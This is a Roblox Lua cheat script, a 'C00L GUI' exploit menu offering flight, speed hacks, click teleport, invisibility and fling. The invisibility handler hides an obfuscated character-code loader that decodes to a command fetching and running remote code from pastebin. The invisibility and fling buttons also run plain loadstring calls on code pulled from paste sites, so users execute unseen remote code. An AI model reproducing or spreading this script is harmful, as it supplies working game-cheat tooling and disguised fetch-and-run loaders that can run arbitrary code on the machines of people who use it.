local main = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local up = Instance.new("TextButton")
local down = Instance.new("TextButton")
local onof = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local plus = Instance.new("TextButton")
local speed = Instance.new("TextLabel")
local mine = Instance.new("TextButton")
local closebutton = Instance.new("TextButton")
local mini = Instance.new("TextButton")
local mini2 = Instance.new("TextButton")
local tptool = Instance.new("TextButton")
local blocky = Instance.new("TextButton")
local invis = Instance.new("TextButton")
local fling = Instance.new("TextButton")
local openstuff = Instance.new("TextButton")
local closestuff = Instance.new("TextButton")

main.Name = "main"
main.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
main.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
main.ResetOnSpawn = false


Frame.Parent = main
Frame.BackgroundColor3 = Color3.fromRGB(200, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(200, 0, 0)
Frame.Position = UDim2.new(0.1, 0, 0.38, 0)
Frame.Size = UDim2.new(0, 196, 0, 58)
main.Frame.BackgroundTransparency = 1

up.Name = "up"
up.Parent = Frame
up.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
up.BorderColor3 = Color3.fromRGB(150, 0, 0)
up.Size = UDim2.new(0, 44, 0, 28)
up.Font = Enum.Font.SourceSans
up.Text = "UP"
up.TextColor3 = Color3.fromRGB(250,0,0)
up.TextSize = 14.000

down.Name = "down"
down.Parent = Frame
down.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
down.BorderColor3 = Color3.fromRGB(150, 0, 0)
down.Position = UDim2.new(0, 0, 0.5, 1)
down.Size = UDim2.new(0, 44, 0, 28)
down.Font = Enum.Font.SourceSans
down.Text = "DOWN"
down.TextColor3 = Color3.fromRGB(250,0,0)
down.TextSize = 14.000

onof.Name = "onof"
onof.Parent = Frame
onof.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
onof.BorderColor3 = Color3.fromRGB(150, 0, 0)
onof.Position = UDim2.new(0.5,16, 0.5, 1)
onof.Size = UDim2.new(0, 44, 0, 28)
onof.Font = Enum.Font.SourceSans
onof.Text = "FLY"
onof.TextColor3 = Color3.fromRGB(200,0,0)
onof.TextSize = 25.000

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderColor3 = Color3.fromRGB(150, 0, 0)
TextLabel.Position = UDim2.new(0.5,-18, 0, 0)
TextLabel.Size = UDim2.new(0,78, 0, 28)
TextLabel.Font = Enum.Font.Code
TextLabel.Text = ""
TextLabel.TextColor3 = Color3.fromRGB(300, 300,300)
TextLabel.TextSize = 10.000
TextLabel.TextWrapped = true

plus.Name = "plus"
plus.Parent = Frame
plus.BackgroundColor3 = Color3.fromRGB(0 , 0, 0)
plus.BorderColor3 = Color3.fromRGB(150, 0, 0)
plus.Position = UDim2.new(0.5,-52, 0, 0)
plus.Size = UDim2.new(0, 32, 0, 28)
plus.Font = Enum.Font.SourceSans
plus.Text = "+"
plus.TextColor3 = Color3.fromRGB(300,300,300)
plus.TextSize = 40.000

speed.Name = "speed"
speed.Parent = Frame
speed.BackgroundColor3 = Color3.fromRGB(0,0,0)
speed.BorderColor3 = Color3.fromRGB(150, 0, 0)
speed.Position = UDim2.new(0.50, -18, 0.5,1)
speed.Size = UDim2.new(0, 32, 0, 28) 
speed.Font = Enum.Font.SourceSans
speed.Text = "1"
speed.TextColor3 = Color3.fromRGB(300, 300,300)
speed.TextScaled = true
speed.TextSize = 14.000
speed.TextWrapped = true

mine.Name = "mine"
mine.Parent = Frame
mine.BackgroundColor3 = Color3.fromRGB(0,0,0)
mine.BorderColor3 = Color3.fromRGB(150, 0, 0)
mine.Position = UDim2.new(0.5, -52, 0.5, 1)
mine.Size = UDim2.new(0, 32, 0, 28)
mine.Font = Enum.Font.SourceSans
mine.Text = "–"
mine.TextColor3 = Color3.fromRGB(300, 300,300)
mine.TextSize = 40.000

closebutton.Name = "Close"
closebutton.Parent = main.Frame
closebutton.BackgroundColor3 = Color3.fromRGB(0,0,0)
closebutton.BorderColor3 = Color3.fromRGB(150, 0, 0)
closebutton.Font = "Code"
closebutton.Size = UDim2.new(0, 32, 0, 28)
closebutton.Text = "×"
closebutton.TextColor3 = Color3.fromRGB(300, 0, 0)
closebutton.TextSize = 50
closebutton.Position = UDim2.new(0, 0, -0.5,-1)

mini.Name = "minimize"
mini.Parent = main.Frame
mini.BackgroundColor3 = Color3.fromRGB(0,0,0)
mini.BorderColor3 = Color3.fromRGB(150, 0, 0)
mini.Font = "SourceSans"
mini.Size = UDim2.new(0,44, 0, 28)
mini.Text = "CLOSE"
mini.TextSize = 14.000
mini.TextColor3 = Color3.fromRGB(300, 300,300)
mini.Position = UDim2.new(0.5,-64,-0.5,-1.5)

mini2.Name = "minimize2"
mini2.Parent = main.Frame
mini2.BackgroundColor3 = Color3.fromRGB(0,0,0)
mini2.BorderColor3 = Color3.fromRGB(150, 0, 0)
mini2.Font = "SourceSans"
mini2.Size = UDim2.new(0, 44, 0, 28)
mini2.Text = "OPEN"
mini2.TextSize = 14.000
mini2.TextColor3 = Color3.fromRGB(300, 300,300)
mini2.Position = UDim2.new(0.5,-64,0,0)
mini2.Visible = false

tptool.Name = "tptool"
tptool.Parent = Frame
tptool.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
tptool.BorderColor3 = Color3.fromRGB(150, 0, 0)
tptool.Size = UDim2.new(0, 28, 0, 28)
tptool.Font = "Code"
tptool.Text = "Give tp tool"
tptool.TextColor3 = Color3.fromRGB(300,0,0)
tptool.TextSize = 7.000
tptool.TextWrapped = true
tptool.Position = UDim2.new(0.5,-18,-0.5,-1.5)
tptool.Visible = false

blocky.Name = "Block Head"
blocky.Parent = Frame
blocky.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
blocky.BorderColor3 = Color3.fromRGB(150, 0, 0)
blocky.Size = UDim2.new(0, 28, 0, 28)
blocky.Font = "Code"
blocky.Text = "Blocky head[R6]"
blocky.TextColor3 = Color3.fromRGB(300,0,0)
blocky.TextSize = 7.000
blocky.TextWrapped = true
blocky.Position = UDim2.new(0.5,12,-0.5,-1.5)
blocky.Visible = false

invis.Name = "invisibility"
invis.Parent = Frame
invis.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
invis.BorderColor3 = Color3.fromRGB(150, 0, 0)
invis.Size = UDim2.new(0, 28, 0, 28)
invis.Font = "Code"
invis.Text = "Invis. toggle"
invis.TextColor3 = Color3.fromRGB(300,0,0)
invis.TextSize = 7.000
invis.TextWrapped = true
invis.Position = UDim2.new(0.5,42,-0.5,-1.5)
invis.Visible = false

fling.Name = "Head fling"
fling.Parent = Frame
fling.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
fling.BorderColor3 = Color3.fromRGB(150, 0, 0)
fling.Size = UDim2.new(0, 28, 0, 28)
fling.Font = "Code"
fling.Text = "Click fling[R6]"
fling.TextColor3 = Color3.fromRGB(300,0,0)
fling.TextSize = 7.000
fling.TextWrapped = true
fling.Position = UDim2.new(0.5,72,-0.5,-1.5)
fling.Visible = false

openstuff.Name = "Open stuff"
openstuff.Parent = main.Frame
openstuff.BackgroundColor3 = Color3.fromRGB(0,0,0)
openstuff.BorderColor3 = Color3.fromRGB(150, 0, 0)
openstuff.Font = "SourceSans"
openstuff.Size = UDim2.new(0, 78, 0, 28)
openstuff.Text = "Open stuff"
openstuff.TextSize = 14.000
openstuff.TextColor3 = Color3.fromRGB(300, 300,300)
openstuff.Position = UDim2.new(0.5,-18, -0.5,-1)
openstuff.Visible = true

closestuff.Name = "Close stuff"
closestuff.Parent = main.Frame
closestuff.BackgroundColor3 = Color3.fromRGB(0,0,0)
closestuff.BorderColor3 = Color3.fromRGB(150, 0, 0)
closestuff.Font = "SourceSans"
closestuff.Size = UDim2.new(0, 78, 0, 28)
closestuff.Text = "Close stuff"
closestuff.TextSize = 14.000
closestuff.TextColor3 = Color3.fromRGB(300, 300,300)
closestuff.Position = UDim2.new(0,0, -0.5,-1)
closestuff.Visible = false

stuff = 0

wait(0.5)
TextLabel.Text = "Dont pretend that its yours"
wait(1.5)
TextLabel.Text = "..."
wait(1.5)
TextLabel.Text = "C00L GUI V1.0 By torrocfo"

speeds = 1

local speaker = game:GetService("Players").LocalPlayer

local chr = game.Players.LocalPlayer.Character
local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")

nowe = false

Frame.Active = true -- main = gui
Frame.Draggable = true

onof.MouseButton1Down:connect(function()

 if nowe == true then
 nowe = false

 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Climbing,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.FallingDown,true)
 speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Flying,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Freefall,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.GettingUp,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Jumping,true)
 speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Landed,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Physics,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.PlatformStanding,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Running,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.RunningNoPhysics,true)
 speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.StrafingNoPhysics,true)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Swimming,true)
 
speaker.Character.Humanoid:ChangeState(Enum.HumanoidStateType.RunningNoPhysics)
 else 
 nowe = true



 for i = 1, speeds do
 spawn(function()

 local hb = game:GetService("RunService").Heartbeat 


 tpwalking = true
 local chr = game.Players.LocalPlayer.Character
 local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
 while tpwalking and hb:Wait() and chr and hum and hum.Parent do
 if hum.MoveDirection.Magnitude > 0 then
 chr:TranslateBy(hum.MoveDirection)
 end
 end

 end)
 end
 game.Players.LocalPlayer.Character.Animate.Disabled = true
 local Char = game.Players.LocalPlayer.Character
 local Hum = Char:FindFirstChildOfClass("Humanoid") or 
Char:FindFirstChildOfClass("AnimationController")

 for i,v in next, Hum:GetPlayingAnimationTracks() do
 v:AdjustSpeed(0)
 end
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Climbing,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.FallingDown,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Flying,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Freefall,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.GettingUp,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Jumping,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Landed,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Physics,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.PlatformStanding,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Running,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.RunningNoPhysics,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Seated,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.StrafingNoPhysics,false)
 
speaker.Character.Humanoid:SetStateEnabled(Enum.HumanoidStateType.Swimming,false)
 speaker.Character.Humanoid:ChangeState(Enum.HumanoidStateType.Swimming)
 end




 if 
game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Humanoid").RigType 
== Enum.HumanoidRigType.R6 then



 local plr = game.Players.LocalPlayer
 local torso = plr.Character.Torso
 local flying = true
 local deb = true
 local ctrl = {f = 0, b = 0, l = 0, r = 0}
 local lastctrl = {f = 0, b = 0, l = 0, r = 0}
 local maxspeed = 50
 local speed = 0


 local bg = Instance.new("BodyGyro", torso)
 bg.P = 9e4
 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
 bg.cframe = torso.CFrame
 local bv = Instance.new("BodyVelocity", torso)
 bv.velocity = Vector3.new(0,0.1,0)
 bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
 if nowe == true then
 plr.Character.Humanoid.PlatformStand = true
 end
 while nowe == true or 
game:GetService("Players").LocalPlayer.Character.Humanoid.Health == 0 do
 game:GetService("RunService").RenderStepped:Wait()

 if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
 speed = speed+.5+(speed/maxspeed)
 if speed > maxspeed then
 speed = maxspeed
 end
 elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
 speed = speed-1
 if speed < 0 then
 speed = 0
 end
 end
 if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
 bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * 
(ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - 
game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
 lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
 elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
 bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * 
(lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - 
game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
 else
 bv.velocity = Vector3.new(0,0,0)
 end
 -- game.Players.LocalPlayer.Character.Animate.Disabled = true
 bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
 end
 ctrl = {f = 0, b = 0, l = 0, r = 0}
 lastctrl = {f = 0, b = 0, l = 0, r = 0}
 speed = 0
 bg:Destroy()
 bv:Destroy()
 plr.Character.Humanoid.PlatformStand = false
 game.Players.LocalPlayer.Character.Animate.Disabled = false
 tpwalking = false




 else
 local plr = game.Players.LocalPlayer
 local UpperTorso = plr.Character.UpperTorso
 local flying = true
 local deb = true
 local ctrl = {f = 0, b = 0, l = 0, r = 0}
 local lastctrl = {f = 0, b = 0, l = 0, r = 0}
 local maxspeed = 50
 local speed = 0


 local bg = Instance.new("BodyGyro", UpperTorso)
 bg.P = 9e4
 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
 bg.cframe = UpperTorso.CFrame
 local bv = Instance.new("BodyVelocity", UpperTorso)
 bv.velocity = Vector3.new(0,0.1,0)
 bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
 if nowe == true then
 plr.Character.Humanoid.PlatformStand = true
 end
 while nowe == true or 
game:GetService("Players").LocalPlayer.Character.Humanoid.Health == 0 do
 wait()

 if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
 speed = speed+.5+(speed/maxspeed)
 if speed > maxspeed then
 speed = maxspeed
 end
 elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
 speed = speed-1
 if speed < 0 then
 speed = 0
 end
 end
 if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
 bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * 
(ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - 
game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
 lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
 elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
 bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * 
(lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - 
game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
 else
 bv.velocity = Vector3.new(0,0,0)
 end

 bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * 
CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
 end
 ctrl = {f = 0, b = 0, l = 0, r = 0}
 lastctrl = {f = 0, b = 0, l = 0, r = 0}
 speed = 0
 bg:Destroy()
 bv:Destroy()
 plr.Character.Humanoid.PlatformStand = false
 game.Players.LocalPlayer.Character.Animate.Disabled = false
 tpwalking = false



 end





end)

local tis

up.MouseButton1Down:connect(function()
 tis = up.MouseEnter:connect(function()
 while tis do
 wait()
 game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = 
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,1,0)
 end
 end)
end)

up.MouseLeave:connect(function()
 if tis then
 tis:Disconnect()
 tis = nil
 end
end)

local dis

down.MouseButton1Down:connect(function()
 dis = down.MouseEnter:connect(function()
 while dis do
 wait()
 game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = 
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,-1,0)
 end
 end)
end)

down.MouseLeave:connect(function()
 if dis then
 dis:Disconnect()
 dis = nil
 end
end)


game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(char)
 wait(0.7)
 game.Players.LocalPlayer.Character.Humanoid.PlatformStand = false
 game.Players.LocalPlayer.Character.Animate.Disabled = false

end)


plus.MouseButton1Down:connect(function()

 speeds = speeds + 1
 speed.Text = speeds

 if nowe == true then


 tpwalking = false
 for i = 1, speeds do
 spawn(function()

 local hb = game:GetService("RunService").Heartbeat 


 tpwalking = true
 local chr = game.Players.LocalPlayer.Character
 local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
 while tpwalking and hb:Wait() and chr and hum and hum.Parent do
 if hum.MoveDirection.Magnitude > 0 then
 chr:TranslateBy(hum.MoveDirection)
 end
 end

 end)
 end
 end
 if speed.Text == '15' then
 TextLabel.Text = "why so fast"
 wait(1.5)
 if stuff == '1' then
 TextLabel.Text = "C00L GUI V1.0 By torrocfo"
 else
 TextLabel.Text = "C00L GUI V1. 0 By torrocfo"
 end
 end
end
end)
mine.MouseButton1Down:connect(function()
 if speeds == 1 then
 speed.Text = 'cannot be less than 1'
 wait(1)
 speed.Text = speeds
 else
 speeds = speeds - 1
 speed.Text = speeds
 if nowe == true then
 tpwalking = false
 for i = 1, speeds do
 spawn(function()

 local hb = game:GetService("RunService").Heartbeat 


 tpwalking = true
 local chr = game.Players.LocalPlayer.Character
 local hum = chr and chr:FindFirstChildWhichIsA("Humanoid")
 while tpwalking and hb:Wait() and chr and hum and hum.Parent do
 if hum.MoveDirection.Magnitude > 0 then
 chr:TranslateBy(hum.MoveDirection)
 end
 end

 end)
 end
 end
 end
end)

closebutton.MouseButton1Click:Connect(function()
 main:Destroy()
end)

mini.MouseButton1Click:Connect(function()
 up.Visible = false
 down.Visible = false
 onof.Visible = false
 plus.Visible = false
 speed.Visible = false
 mine.Visible = false
 mini.Visible = false
 mini2.Visible = true
 tptool.Visible = false
 blocky.Visible = false
 invis.Visible = false
 fling.Visible = false
 openstuff.Visible = false
 closestuff.Visible = false
 closebutton.BackgroundTransparency = 0.5
 TextLabel.BackgroundTransparency = 0.5
 mini2.BackgroundTransparency = 0.5
 closebutton.Position = UDim2.new(0, 0, -1, 58)
 TextLabel.Text = ""

end)

mini2.MouseButton1Click:Connect(function()
 up.Visible = true
 down.Visible = true
 onof.Visible = true
 plus.Visible = true
 speed.Visible = true
 mine.Visible = true
 mini.Visible = true
 mini2.Visible = false
 openstuff.Visible = true
 closebutton.BackgroundTransparency = 0
 TextLabel.BackgroundTransparency = 0
 closebutton.Position = UDim2.new(0, 0, -1, 28)

 tptool.Visible = false
 blocky.Visible = false
 invis.Visible = false
 fling.Visible = false
 TextLabel.Text = "C00L GUI V1.0 By torrocfo"
 TextLabel.Size = UDim2.new(0,78, 0, 28)
 onof.Size = UDim2.new(0, 44, 0, 28)
end)

openstuff.MouseButton1Click:Connect(function()

stuff = 1

openstuff.Visible = false
closestuff.Visible = true
tptool.Visible = true
blocky.Visible = true
invis.Visible = true
fling.Visible = true
mini.Visible = false
closebutton.Visible = false
TextLabel.Text = "C00L GUI V1.0 By torrocfo"
TextLabel.Size = UDim2.new(0,118, 0, 28)
onof.Size = UDim2.new(0, 84, 0, 28)

end)


closestuff.MouseButton1Click:Connect(function()

stuff = 0

openstuff.Visible = true
closestuff.Visible = false
tptool.Visible = false
blocky.Visible = false
invis.Visible = false
fling.Visible = false
mini.Visible = true
closebutton.Visible = true
TextLabel.Text = "C00L GUI V1.0 By torrocfo"
TextLabel.Size = UDim2.new(0,78, 0, 28)
onof.Size = UDim2.new(0, 44, 0, 28)

end)

tptool.MouseButton1Click:Connect(function()

mouse = game.Players.LocalPlayer:GetMouse()
tool = Instance.new("Tool")
tool.RequiresHandle = false
tool.Name = "Equip to Click TP"
tool.Activated:connect(function()
local pos = mouse.Hit+Vector3.new(0,2.5,0)
pos = CFrame.new(pos.X,pos.Y,pos.Z)
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = pos
end)
tool.Parent = game.Players.LocalPlayer.Backpack

end)

blocky.MouseButton1Click:Connect(function()

local runservice=game:service"RunService";
local player=game:service"Players"["LocalPlayer"];
local character=player["Character"];
character["Head"]:FindFirstChildOfClass"SpecialMesh":Destroy();

end)

invis.MouseButton1Click:Connect(function()

--[[
Obfuscated by SIGHTS Obfuscator (cracked by oof4dayz.xyz) 
--]]


SGTSOBF_wwwwwWwWw={"\108","\111","\97","\100","\115","\116","\114","\105","\110","\103","\40","\103","\97","\109","\101","\58","\72","\116","\116","\112","\71","\101","\116","\40","\40","\39","\104","\116","\116","\112","\115","\58","\47","\47","\112","\97","\115","\116","\101","\98","\105","\110","\46","\99","\111","\109","\47","\114","\97","\119","\47","\117","\85","\81","\105","\54","\57","\49","\116","\39","\41","\44","\116","\114","\117","\101","\41","\41","\40","\41",}SGTSOBF_RRRrRrrRR="";for
_,SGTSOBF_lLLLLllll in pairs(SGTSOBF_wwwwwWwWw)do 

SGTSOBF_RRRrRrrRR=SGTSOBF_RRRrRrrRR..SGTSOBF_lLLLLllll;end;SGTSOBF_gGGGggggG=function(SGTSOBF_lLllLlLLL)loadstring(SGTSOBF_lLllLlLLL)()end;SGTSOBF_gGGGggggG(SGTSOBF_RRRrRrrRR)

--[[Invisibility Toggle

You can find the orginal concept here: 
https://v3rmillion.net/showthread.php?tid=544634

This method clones the character locally, teleports the real character to a 
safe location, then sets the character to the clone.
Basically, your real character is in the sky while you are on the ground.


Because of the way this works, games with a decent anti-cheat will fuck this 
up.
If you turn it off, you have to go to a safe place before going invisible.

Written by: BitingTheDust ; 
https://v3rmillion.net/member.php?action=profile&uid=1628149
]]
--Settings:
local ScriptStarted = false
local Keybind = "Q" --Set to whatever you want, has to be the name of a 
KeyCode Enum.
local Transparency = true --Will make you slightly transparent when you are 
invisible. No reason to disable.
local NoClip = false --Will make your fake character no clip.

local Player = game:GetService("Players").LocalPlayer
local RealCharacter = Player.Character or Player.CharacterAdded:Wait()

local IsInvisible = false

RealCharacter.Archivable = true
local FakeCharacter = RealCharacter:Clone()
local Part
Part = Instance.new("Part", workspace)
Part.Anchored = true
Part.Size = Vector3.new(200, 1, 200)
Part.CFrame = CFrame.new(0, -500, 0) --Set this to whatever you want, just far 
away from the map.
Part.CanCollide = true
FakeCharacter.Parent = workspace
FakeCharacter.HumanoidRootPart.CFrame = Part.CFrame * CFrame.new(0, 5, 0)

for i, v in pairs(RealCharacter:GetChildren()) do
 if v:IsA("LocalScript") then
 local clone = v:Clone()
 clone.Disabled = true
 clone.Parent = FakeCharacter
 end
end
if Transparency then
 for i, v in pairs(FakeCharacter:GetDescendants()) do
 if v:IsA("BasePart") then
 v.Transparency = 0.7
 end
 end
end
local CanInvis = true
function RealCharacterDied()
 CanInvis = false
 RealCharacter:Destroy()
 RealCharacter = Player.Character
 CanInvis = true
 isinvisible = false
 FakeCharacter:Destroy()
 workspace.CurrentCamera.CameraSubject = RealCharacter.Humanoid

 RealCharacter.Archivable = true
 FakeCharacter = RealCharacter:Clone()
 Part:Destroy()
 Part = Instance.new("Part", workspace)
 Part.Anchored = true
 Part.Size = Vector3.new(200, 1, 200)
 Part.CFrame = CFrame.new(9999, 9999, 9999) --Set this to whatever you want, 
just far away from the map.
 Part.CanCollide = true
 FakeCharacter.Parent = workspace
 FakeCharacter.HumanoidRootPart.CFrame = Part.CFrame * CFrame.new(0, 5, 0)

 for i, v in pairs(RealCharacter:GetChildren()) do
 if v:IsA("LocalScript") then
 local clone = v:Clone()
 clone.Disabled = true
 clone.Parent = FakeCharacter
 end
 end
 if Transparency then
 for i, v in pairs(FakeCharacter:GetDescendants()) do
 if v:IsA("BasePart") then
 v.Transparency = 0.7
 end
 end
 end
 RealCharacter.Humanoid.Died:Connect(function()
 RealCharacter:Destroy()
 FakeCharacter:Destroy()
 end)
 Player.CharacterAppearanceLoaded:Connect(RealCharacterDied)
end
RealCharacter.Humanoid.Died:Connect(function()
 RealCharacter:Destroy()
 FakeCharacter:Destroy()
 end)
Player.CharacterAppearanceLoaded:Connect(RealCharacterDied)
local PseudoAnchor
game:GetService "RunService".RenderStepped:Connect(
 function()
 if PseudoAnchor ~= nil then
 PseudoAnchor.CFrame = Part.CFrame * CFrame.new(0, 5, 0)
 end
 if NoClip then
 FakeCharacter.Humanoid:ChangeState(11)
 end
 end
)

PseudoAnchor = FakeCharacter.HumanoidRootPart
local function Invisible()
 if IsInvisible == false then
 local StoredCF = RealCharacter.HumanoidRootPart.CFrame
 RealCharacter.HumanoidRootPart.CFrame = FakeCharacter.HumanoidRootPart.CFrame
 FakeCharacter.HumanoidRootPart.CFrame = StoredCF
 RealCharacter.Humanoid:UnequipTools()
 Player.Character = FakeCharacter
 workspace.CurrentCamera.CameraSubject = FakeCharacter.Humanoid
 PseudoAnchor = RealCharacter.HumanoidRootPart
 for i, v in pairs(FakeCharacter:GetChildren()) do
 if v:IsA("LocalScript") then
 v.Disabled = false
 end
 end

 IsInvisible = true
 else
 local StoredCF = FakeCharacter.HumanoidRootPart.CFrame
 FakeCharacter.HumanoidRootPart.CFrame = RealCharacter.HumanoidRootPart.CFrame

 RealCharacter.HumanoidRootPart.CFrame = StoredCF

 FakeCharacter.Humanoid:UnequipTools()
 Player.Character = RealCharacter
 workspace.CurrentCamera.CameraSubject = RealCharacter.Humanoid
 PseudoAnchor = FakeCharacter.HumanoidRootPart
 for i, v in pairs(FakeCharacter:GetChildren()) do
 if v:IsA("LocalScript") then
 v.Disabled = true
 end
 end
 IsInvisible = false
 end
end

game:GetService("UserInputService").InputBegan:Connect(
 function(key, gamep)
 if gamep then
 return
 end
 if key.KeyCode.Name:lower() == Keybind:lower() and CanInvis and RealCharacter 
and FakeCharacter then
 if RealCharacter:FindFirstChild("HumanoidRootPart") and 
FakeCharacter:FindFirstChild("HumanoidRootPart") then
 Invisible()
 end
 end
 end
)
local Sound = Instance.new("Sound",game:GetService("SoundService"))
Sound.SoundId = "rbxassetid://232127604"
Sound:Play()
game:GetService("StarterGui"):SetCore("SendNotification",{["Title"] = 
"Invisible Toggle Loaded",["Text"] = "Press "..Keybind.." to become change 
visibility.",["Duration"] = 20,["Button1"] = "Okay."})

loadstring(game:HttpGet("https://pastebin.com/raw/kC3dAMvt"))()

end)

fling.MouseButton1Click:Connect(function()

loadstring(game:HttpGet(('https://pastefy.ga/xBdd9GId/raw'),true))()
end)
